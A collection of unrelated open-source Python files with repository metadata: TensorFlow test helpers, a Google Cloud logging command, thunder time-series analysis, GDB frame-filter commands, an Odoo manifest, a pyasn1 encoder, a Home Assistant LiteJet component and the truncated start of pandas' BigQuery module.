make_scanner = c_make_scanner or py_make_scanner
|
bsd-3-clause
|
Weihonghao/ECM
|
Vpy34/lib/python3.5/site-packages/tensorflow/contrib/learn/python/learn/estimators/estimator_test_utils.py
|
11
|
2081
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import tensorflow as tf
FLAGS = tf.flags.FLAGS
def assert_estimator_contract(tester, estimator_class):
"""Asserts whether given estimator satisfies the expected contract.
This doesn't check every details of contract. This test is used for that a
function is not forgotten to implement in a precanned Estimator.
Args:
tester: A tf.test.TestCase.
estimator_class: 'type' object of pre-canned estimator.
"""
attributes = inspect.getmembers(estimator_class)
attribute_names = [a[0] for a in attributes]
tester.assertTrue('config' in attribute_names)
tester.assertTrue('evaluate' in attribute_names)
tester.assertTrue('export' in attribute_names)
tester.assertTrue('fit' in attribute_names)
tester.assertTrue('get_variable_names' in attribute_names)
tester.assertTrue('get_variable_value' in attribute_names)
tester.assertTrue('model_dir' in attribute_names)
tester.assertTrue('predict' in attribute_names)
def assert_in_range(min_value, max_value, key, metrics):
actual_value = metrics[key]
if actual_value < min_value:
raise ValueError('%s: %s < %s.' % (key, actual_value, min_value))
if actual_value > max_value:
raise ValueError('%s: %s > %s.' % (key, actual_value, max_value))
|
agpl-3.0
|
Sorsly/subtle
|
google-cloud-sdk/lib/surface/logging/metrics/delete.py
|
6
|
2018
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'logging metrics delete' command."""
from googlecloudsdk.api_lib.logging import util
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a logs-based metric."""
@staticmethod
def Args(parser):
"""Register flags for this command."""
parser.add_argument(
'metric_name', help='The name of the metric to delete.')
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
"""
if not console_io.PromptContinue(
'Really delete metric [%s]?' % args.metric_name):
raise exceptions.ToolException('action canceled by user')
util.GetClient().projects_metrics.Delete(
util.GetMessages().LoggingProjectsMetricsDeleteRequest(
metricName=util.CreateResourceName(
util.GetCurrentProjectParent(), 'metrics', args.metric_name)))
log.DeletedResource(args.metric_name)
Delete.detailed_help = {
'DESCRIPTION': """\
Deletes a logs-based metric called high_severity_count.
""",
'EXAMPLES': """\
To delete a metric called high_severity_count, run:
$ {command} high_severity_count
""",
}
|
mit
|
zhwa/thunder
|
thunder/rdds/timeseries.py
|
7
|
10869
|
from numpy import sqrt, pi, angle, fft, fix, zeros, roll, dot, mean, \
array, size, asarray, polyfit, polyval, arange, \
percentile, ceil, float64, where, floor
from thunder.rdds.series import Series
from thunder.utils.common import loadMatVar, checkParams
class TimeSeries(Series):
"""
Distributed collection of time series data.
Backed by an RDD of key-value pairs where the key is an identifier
and the value is a one-dimensional array. The common index
specifies the time of each entry in the array.
Parameters
----------
rdd : RDD of (tuple, array) pairs
RDD containing the series data.
index : array-like
Time indices, must be same length as the arrays in the input data.
Defaults to arange(len(data)) if not provided.
dims : Dimensions
Specify the dimensions of the keys (min, max, and count), can
avoid computation if known in advance.
See also
--------
Series : base class for Series data
"""
# use superclass __init__
@property
def _constructor(self):
return TimeSeries
def _makeWindowMasks(self, indices, window):
"""
Make masks used by windowing functions
Given a list of indices specifying window centers,
and a window size, construct a list of index arrays,
one per window, that index into the target array
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
before = window / 2
after = window / 2 + divmod(window, 2)[1]
index = asarray(self.index)
indices = asarray(indices)
if where(index == max(indices))[0][0] + after > len(index):
raise ValueError("Maximum requested index %g, with window %g, exceeds length %g"
% (max(indices), window, len(index)))
if where(index == min(indices))[0][0] - before < 0:
raise ValueError("Minimum requested index %g, with window %g, is less than 0"
% (min(indices), window))
masks = [arange(where(index == i)[0][0]-before, where(index == i)[0][0]+after) for i in indices]
return masks
def meanByWindow(self, indices, window):
"""
Average time series across multiple windows specified by their centers
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
masks = self._makeWindowMasks(indices, window)
rdd = self.rdd.mapValues(lambda x: mean([x[m] for m in masks], axis=0))
index = arange(0, len(masks[0]))
return self._constructor(rdd, index=index).__finalize__(self)
def groupByWindow(self, indices, window):
"""
Group time series into multiple windows specified by their centers
Parameters
----------
indices : array-like
List of times specifying window centers
window : int
Window size
"""
masks = self._makeWindowMasks(indices, window)
rdd = self.rdd.flatMap(lambda (k, x): [(k + (i, ), x[m]) for i, m in enumerate(masks)])
index = arange(0, len(masks[0]))
nrecords = self.nrecords * len(indices)
return self._constructor(rdd, index=index, nrecords=nrecords).__finalize__(self)
def subsample(self, sampleFactor=2):
"""
Subsample time series by an integer factor
Parameters
----------
sampleFactor : positive integer, optional, default=2
"""
if sampleFactor < 0:
raise Exception('Factor for subsampling must be postive, got %g' % sampleFactor)
s = slice(0, len(self.index), sampleFactor)
newIndex = self.index[s]
return self._constructor(
self.rdd.mapValues(lambda v: v[s]), index=newIndex).__finalize__(self)
def fourier(self, freq=None):
"""
Compute statistics of a Fourier decomposition on time series data
Parameters
----------
freq : int
Digital frequency at which to compute coherence and phase
"""
def get(y, freq):
y = y - mean(y)
nframes = len(y)
ft = fft.fft(y)
ft = ft[0:int(fix(nframes/2))]
ampFt = 2*abs(ft)/nframes
amp = ampFt[freq]
ampSum = sqrt(sum(ampFt**2))
co = amp / ampSum
ph = -(pi/2) - angle(ft[freq])
if ph < 0:
ph += pi * 2
return array([co, ph])
if freq >= int(fix(size(self.index)/2)):
raise Exception('Requested frequency, %g, is too high, must be less than half the series duration' % freq)
rdd = self.rdd.mapValues(lambda x: get(x, freq))
return Series(rdd, index=['coherence', 'phase']).__finalize__(self)
def convolve(self, signal, mode='full', var=None):
"""
Conolve time series data against another signal
Parameters
----------
signal : array, or str
Signal to convolve with, can be a numpy array or a
MAT file containing the signal as a variable
var : str
Variable name if loading from a MAT file
mode : str, optional, default='full'
Mode of convolution, options are 'full', 'same', and 'same'
"""
from numpy import convolve
if type(signal) is str:
s = loadMatVar(signal, var)
else:
s = asarray(signal)
n = size(self.index)
m = size(s)
newrdd = self.rdd.mapValues(lambda x: convolve(x, signal, mode))
# use expected lengths to make a new index
if mode == 'same':
newmax = max(n, m)
elif mode == 'valid':
newmax = max(m, n) - min(m, n) + 1
else:
newmax = n+m-1
newindex = arange(0, newmax)
return self._constructor(newrdd, index=newindex).__finalize__(self)
def crossCorr(self, signal, lag=0, var=None):
"""
Cross correlate time series data against another signal
Parameters
----------
signal : array, or str
Signal to correlate against, can be a numpy array or a
MAT file containing the signal as a variable
var : str
Variable name if loading from a MAT file
lag : int
Range of lags to consider, will cover (-lag, +lag)
"""
from scipy.linalg import norm
if type(signal) is str:
s = loadMatVar(signal, var)
else:
s = asarray(signal)
# standardize signal
s = s - mean(s)
s = s / norm(s)
if size(s) != size(self.index):
raise Exception('Size of signal to cross correlate with, %g, does not match size of series' % size(s))
# created a matrix with lagged signals
if lag is not 0:
shifts = range(-lag, lag+1)
d = len(s)
m = len(shifts)
sShifted = zeros((m, d))
for i in range(0, len(shifts)):
tmp = roll(s, shifts[i])
if shifts[i] < 0: # zero padding
tmp[(d+shifts[i]):] = 0
if shifts[i] > 0:
tmp[:shifts[i]] = 0
sShifted[i, :] = tmp
s = sShifted
else:
shifts = 0
def get(y, s):
y = y - mean(y)
n = norm(y)
if n == 0:
b = zeros((s.shape[0],))
else:
y /= norm(y)
b = dot(s, y)
return b
rdd = self.rdd.mapValues(lambda x: get(x, s))
return self._constructor(rdd, index=shifts).__finalize__(self)
def detrend(self, method='linear', **kwargs):
"""
Detrend time series data with linear or nonlinear detrending
Preserve intercept so that subsequent steps can adjust the baseline
Parameters
----------
method : str, optional, default = 'linear'
Detrending method
order : int, optional, default = 5
Order of polynomial, for non-linear detrending only
"""
checkParams(method, ['linear', 'nonlinear'])
if method.lower() == 'linear':
order = 1
else:
if 'order' in kwargs:
order = kwargs['order']
else:
order = 5
def func(y):
x = arange(1, len(y)+1)
p = polyfit(x, y, order)
p[-1] = 0
yy = polyval(p, x)
return y - yy
return self.applyValues(func, keepIndex=True)
def normalize(self, baseline='percentile', window=None, perc=20):
"""
Normalize each time series by subtracting and dividing by a baseline.
Baseline can be derived from a global mean or percentile,
or a smoothed percentile estimated within a rolling window.
Parameters
----------
baseline : str, optional, default = 'percentile'
Quantity to use as the baseline, options are 'mean', 'percentile', 'window', or 'window-fast'
window : int, optional, default = 6
Size of window for baseline estimation, for 'window' and 'window-fast' baseline only
perc : int, optional, default = 20
Percentile value to use, for 'percentile', 'window', or 'window-fast' baseline only
"""
checkParams(baseline, ['mean', 'percentile', 'window', 'window-fast'])
method = baseline.lower()
from warnings import warn
if not (method == 'window' or method == 'window-fast') and window is not None:
warn('Setting window without using method "window" has no effect')
if method == 'mean':
baseFunc = mean
if method == 'percentile':
baseFunc = lambda x: percentile(x, perc)
if method == 'window':
if window & 0x1:
left, right = (ceil(window/2), ceil(window/2) + 1)
else:
left, right = (window/2, window/2)
n = len(self.index)
baseFunc = lambda x: asarray([percentile(x[max(ix-left, 0):min(ix+right+1, n)], perc)
for ix in arange(0, n)])
if method == 'window-fast':
from scipy.ndimage.filters import percentile_filter
baseFunc = lambda x: percentile_filter(x.astype(float64), perc, window, mode='nearest')
def get(y):
b = baseFunc(y)
return (y - b) / (b + 0.1)
return self.applyValues(get, keepIndex=True)
|
apache-2.0
|
makermade/arm_android-19_arm-linux-androideabi-4.8
|
share/gdb/python/gdb/command/frame_filters.py
|
126
|
16605
|
# Frame-filter commands.
# Copyright (C) 2013-2014 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""GDB commands for working with frame-filters."""
import sys
import gdb
import copy
from gdb.FrameIterator import FrameIterator
from gdb.FrameDecorator import FrameDecorator
import gdb.frames
import itertools
# GDB Commands.
class SetFilterPrefixCmd(gdb.Command):
"""Prefix command for 'set' frame-filter related operations."""
def __init__(self):
super(SetFilterPrefixCmd, self).__init__("set frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class ShowFilterPrefixCmd(gdb.Command):
"""Prefix command for 'show' frame-filter related operations."""
def __init__(self):
super(ShowFilterPrefixCmd, self).__init__("show frame-filter",
gdb.COMMAND_OBSCURE,
gdb.COMPLETE_NONE, True)
class InfoFrameFilter(gdb.Command):
"""List all registered Python frame-filters.
Usage: info frame-filters
"""
def __init__(self):
super(InfoFrameFilter, self).__init__("info frame-filter",
gdb.COMMAND_DATA)
@staticmethod
def enabled_string(state):
"""Return "Yes" if filter is enabled, otherwise "No"."""
if state:
return "Yes"
else:
return "No"
def list_frame_filters(self, frame_filters):
""" Internal worker function to list and print frame filters
in a dictionary.
Arguments:
frame_filters: The name of the dictionary, as
specified by GDB user commands.
"""
sorted_frame_filters = sorted(frame_filters.items(),
key=lambda i: gdb.frames.get_priority(i[1]),
reverse=True)
if len(sorted_frame_filters) == 0:
print(" No frame filters registered.")
else:
print(" Priority Enabled Name")
for frame_filter in sorted_frame_filters:
name = frame_filter[0]
try:
priority = '{:<8}'.format(
str(gdb.frames.get_priority(frame_filter[1])))
enabled = '{:<7}'.format(
self.enabled_string(gdb.frames.get_enabled(frame_filter[1])))
except Exception:
e = sys.exc_info()[1]
print(" Error printing filter '"+name+"': "+str(e))
else:
print(" %s %s %s" % (priority, enabled, name))
def print_list(self, title, filter_list, blank_line):
print(title)
self.list_frame_filters(filter_list)
if blank_line:
print("")
def invoke(self, arg, from_tty):
self.print_list("global frame-filters:", gdb.frame_filters, True)
cp = gdb.current_progspace()
self.print_list("progspace %s frame-filters:" % cp.filename,
cp.frame_filters, True)
for objfile in gdb.objfiles():
self.print_list("objfile %s frame-filters:" % objfile.filename,
objfile.frame_filters, False)
# Internal enable/disable functions.
def _enable_parse_arg(cmd_name, arg):
""" Internal worker function to take an argument from
enable/disable and return a tuple of arguments.
Arguments:
cmd_name: Name of the command invoking this function.
args: The argument as a string.
Returns:
A tuple containing the dictionary, and the argument, or just
the dictionary in the case of "all".
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argv[0] == "all" and argc > 1:
raise gdb.GdbError(cmd_name + ": with 'all' " \
"you may not specify a filter.")
else:
if argv[0] != "all" and argc != 2:
raise gdb.GdbError(cmd_name + " takes exactly two arguments.")
return argv
def _do_enable_frame_filter(command_tuple, flag):
"""Worker for enabling/disabling frame_filters.
Arguments:
command_type: A tuple with the first element being the
frame filter dictionary, and the second being
the frame filter name.
flag: True for Enable, False for Disable.
"""
list_op = command_tuple[0]
op_list = gdb.frames.return_list(list_op)
if list_op == "all":
for item in op_list:
gdb.frames.set_enabled(item, flag)
else:
frame_filter = command_tuple[1]
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_enabled(ff, flag)
def _complete_frame_filter_list(text, word, all_flag):
"""Worker for frame filter dictionary name completion.
Arguments:
text: The full text of the command line.
word: The most recent word of the command line.
all_flag: Whether to include the word "all" in completion.
Returns:
A list of suggested frame filter dictionary name completions
from text/word analysis. This list can be empty when there
are no suggestions for completion.
"""
if all_flag == True:
filter_locations = ["all", "global", "progspace"]
else:
filter_locations = ["global", "progspace"]
for objfile in gdb.objfiles():
filter_locations.append(objfile.filename)
# If the user just asked for completions with no completion
# hints, just return all the frame filter dictionaries we know
# about.
if (text == ""):
return filter_locations
# Otherwise filter on what we know.
flist = filter(lambda x,y=text:x.startswith(y), filter_locations)
# If we only have one completion, complete it and return it.
if len(flist) == 1:
flist[0] = flist[0][len(text)-len(word):]
# Otherwise, return an empty list, or a list of frame filter
# dictionaries that the previous filter operation returned.
return flist
def _complete_frame_filter_name(word, printer_dict):
"""Worker for frame filter name completion.
Arguments:
word: The most recent word of the command line.
printer_dict: The frame filter dictionary to search for frame
filter name completions.
Returns: A list of suggested frame filter name completions
from word analysis of the frame filter dictionary. This list
can be empty when there are no suggestions for completion.
"""
printer_keys = printer_dict.keys()
if (word == ""):
return printer_keys
flist = filter(lambda x,y=word:x.startswith(y), printer_keys)
return flist
class EnableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: enable frame-filter enable DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of the object-file name.
NAME matches the name of the frame-filter to operate on. If
DICTIONARY is "all", NAME is ignored.
"""
def __init__(self):
super(EnableFrameFilter, self).__init__("enable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("enable frame-filter", arg)
_do_enable_frame_filter(command_tuple, True)
class DisableFrameFilter(gdb.Command):
"""GDB command to disable the specified frame-filter.
Usage: disable frame-filter disable DICTIONARY [NAME]
DICTIONARY is the name of the frame filter dictionary on which to
operate. If dictionary is set to "all", perform operations on all
dictionaries. Named dictionaries are: "global" for the global
frame filter dictionary, "progspace" for the program space's frame
filter dictionary. If either all, or the two named dictionaries
are not specified, the dictionary name is assumed to be the name
of the object-file name.
NAME matches the name of the frame-filter to operate on. If
DICTIONARY is "all", NAME is ignored.
"""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of the object-file name.
NAME matches the name of the frame filter to operate on.
PRIORITY is the an integer to assign the new priority to the frame
filter.
"""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple != None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of the object-file name.
NAME matches the name of the frame-filter to operate on.
"""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
argv = gdb.string_to_argv(arg);
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: object to select printers.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = frame._return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
if command_tuple == None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
priority = self.get_filter_priority(list_name, filter_name);
except Exception:
e = sys.exc_info()[1]
print("Error printing filter priority for '"+name+"':"+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
|
gpl-2.0
|
yvaucher/l10n-italy
|
__unported__/l10n_it_bill_of_entry/__openerp__.py
|
3
|
2507
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2013
# Associazione OpenERP Italia (<http://www.openerp-italia.org>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Italian Localisation - Bill of Entry',
'version': '0.1',
'category': 'Localisation/Italy',
'description': """
Bolle doganali
===============
Specifiche
----------
http://wiki.openerp-italia.org/doku.php/area_utente/requisiti/extraue
Ci sono 3 documenti coinvolti:
- Fattura fornitore
- Fattura spedizioniere
- Bolla doganale
Le relazioni:
N bolle doganali -> N fatture fornitore
1 fattura spedizioniere -> N bolle doganali
Configurazione
--------------
E' necessario configurare in contabilitร il sezionale da utilizzare per il
giroconto di chiusura.
Utilizzo
--------
Dalla bolla doganale รจ possibile collegare manualmente la (o le) fattura(e)
fornitore corrispondente.
Dalla fattura spedizioniere รจ possibile generare la (o le) bolla(e) doganale(i)
tramite il bottone 'genera bolla'. Per questa operazione bisogna prima configurare
un template di fattura (usato per la bolla doganale).
Nella fattura spedizioniere bisogna indicare quale (o quali) riga (righe)
rappresenti(no) l'IVA anticipata alla dogana.
Alla conferma della fattura spedizioniere, verrร generata la scrittura contabile di giroconto per chiudere la bolla doganale.
""",
'author': 'Agile Business Group',
'website': 'http://www.agilebg.com',
'license': 'AGPL-3',
"depends": ['base', 'account_invoice_template'],
"data": [
'account_invoice_view.xml',
'company_view.xml',
],
"demo": [],
'installable': False
}
|
agpl-3.0
|
alfa-jor/addon
|
plugin.video.alfa/lib/sambatools/pyasn1/codec/cer/encoder.py
|
2
|
5130
|
# CER encoder
from pyasn1 import error
from pyasn1.codec.ber import encoder
from pyasn1.compat.octets import int2oct, str2octs, null
from pyasn1.type import univ
from pyasn1.type import useful
class BooleanEncoder(encoder.IntegerEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
if client == 0:
substrate = int2oct(0)
else:
substrate = int2oct(255)
return substrate, 0
class BitStringEncoder(encoder.BitStringEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
return encoder.BitStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class OctetStringEncoder(encoder.OctetStringEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class RealEncoder(encoder.RealEncoder):
def _chooseEncBase(self, value):
m, b, e = value
return self._dropFloatingPoint(m, b, e)
# specialized GeneralStringEncoder here
class GeneralizedTimeEncoder(OctetStringEncoder):
zchar = str2octs('Z')
pluschar = str2octs('+')
minuschar = str2octs('-')
zero = str2octs('0')
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
octets = client.asOctets()
# This breaks too many existing data items
# if '.' not in octets:
# raise error.PyAsn1Error('Format must include fraction of second: %r' % octets)
if len(octets) < 15:
raise error.PyAsn1Error('Bad UTC time length: %r' % octets)
if self.pluschar in octets or self.minuschar in octets:
raise error.PyAsn1Error('Must be UTC time: %r' % octets)
if octets[-1] != self.zchar[0]:
raise error.PyAsn1Error('Missing timezone specifier: %r' % octets)
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class UTCTimeEncoder(encoder.OctetStringEncoder):
zchar = str2octs('Z')
pluschar = str2octs('+')
minuschar = str2octs('-')
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
octets = client.asOctets()
if self.pluschar in octets or self.minuschar in octets:
raise error.PyAsn1Error('Must be UTC time: %r' % octets)
if octets and octets[-1] != self.zchar[0]:
client = client.clone(octets + self.zchar)
if len(client) != 13:
raise error.PyAsn1Error('Bad UTC time length: %r' % client)
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class SetOfEncoder(encoder.SequenceOfEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
if isinstance(client, univ.SequenceAndSetBase):
client.setDefaultComponents()
client.verifySizeSpec()
substrate = null; idx = len(client)
# This is certainly a hack but how else do I distinguish SetOf
# from Set if they have the same tags&constraints?
if isinstance(client, univ.SequenceAndSetBase):
# Set
comps = []
while idx > 0:
idx = idx - 1
if client[idx] is None: # Optional component
continue
if client.getDefaultComponentByPosition(idx) == client[idx]:
continue
comps.append(client[idx])
comps.sort(key=lambda x: isinstance(x, univ.Choice) and \
x.getMinTagSet() or x.getTagSet())
for c in comps:
substrate += encodeFun(c, defMode, maxChunkSize)
else:
# SetOf
compSubs = []
while idx > 0:
idx = idx - 1
compSubs.append(
encodeFun(client[idx], defMode, maxChunkSize)
)
compSubs.sort() # perhaps padding's not needed
substrate = null
for compSub in compSubs:
substrate += compSub
return substrate, 1
tagMap = encoder.tagMap.copy()
tagMap.update({
univ.Boolean.tagSet: BooleanEncoder(),
univ.BitString.tagSet: BitStringEncoder(),
univ.OctetString.tagSet: OctetStringEncoder(),
univ.Real.tagSet: RealEncoder(),
useful.GeneralizedTime.tagSet: GeneralizedTimeEncoder(),
useful.UTCTime.tagSet: UTCTimeEncoder(),
univ.SetOf().tagSet: SetOfEncoder() # conflcts with Set
})
typeMap = encoder.typeMap.copy()
typeMap.update({
univ.Set.typeId: SetOfEncoder(),
univ.SetOf.typeId: SetOfEncoder()
})
class Encoder(encoder.Encoder):
def __call__(self, client, defMode=False, maxChunkSize=0):
return encoder.Encoder.__call__(self, client, defMode, maxChunkSize)
encode = Encoder(tagMap, typeMap)
# EncoderFactory queries class instance and builds a map of tags -> encoders
|
gpl-3.0
|
kyvinh/home-assistant
|
homeassistant/components/litejet.py
|
22
|
1594
|
"""Allows the LiteJet lighting system to be controlled by Home Assistant.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/litejet/
"""
import logging
import voluptuous as vol
from homeassistant.helpers import discovery
from homeassistant.const import CONF_PORT
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pylitejet==0.1']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE_NAMES = 'exclude_names'
CONF_INCLUDE_SWITCHES = 'include_switches'
DOMAIN = 'litejet'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_PORT): cv.string,
vol.Optional(CONF_EXCLUDE_NAMES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_INCLUDE_SWITCHES, default=False): cv.boolean
})
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Initialize the LiteJet component."""
from pylitejet import LiteJet
url = config[DOMAIN].get(CONF_PORT)
hass.data['litejet_system'] = LiteJet(url)
hass.data['litejet_config'] = config[DOMAIN]
discovery.load_platform(hass, 'light', DOMAIN, {}, config)
if config[DOMAIN].get(CONF_INCLUDE_SWITCHES):
discovery.load_platform(hass, 'switch', DOMAIN, {}, config)
discovery.load_platform(hass, 'scene', DOMAIN, {}, config)
return True
def is_ignored(hass, name):
"""Determine if a load, switch, or scene should be ignored."""
for prefix in hass.data['litejet_config'].get(CONF_EXCLUDE_NAMES, []):
if name.startswith(prefix):
return True
return False
|
apache-2.0
|
alephu5/Soundbyte
|
environment/lib/python3.3/site-packages/pandas/io/gbq.py
|
1
|
18985
|
"""
Pandas module to interface with Google BigQuery.
"""
import os
import sys
import tempfile
import csv
import logging
from datetime import datetime
import pkg_resources
from distutils.version import LooseVersion
import pandas as pd
import numpy as np
from pandas.core.common import PandasError
from pandas.core.frame import DataFrame
from pandas.tools.merge import concat
try:
import bq
import bigquery_client
import gflags as flags
_BQ_INSTALLED = True
_BQ_VERSION = pkg_resources.get_distribution('bigquery').version
if LooseVersion(_BQ_VERSION) >= '2.0.17':
_BQ_VALID_VERSION = True
else:
_BQ_VALID_VERSION = False
except ImportError:
_BQ_INSTALLED = False
# Setup the logger
logger = logging.getLogger('pandas.io.gbq')
# These are some custom exceptions that the
# to_gbq() method can throw
class SchemaMissing(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
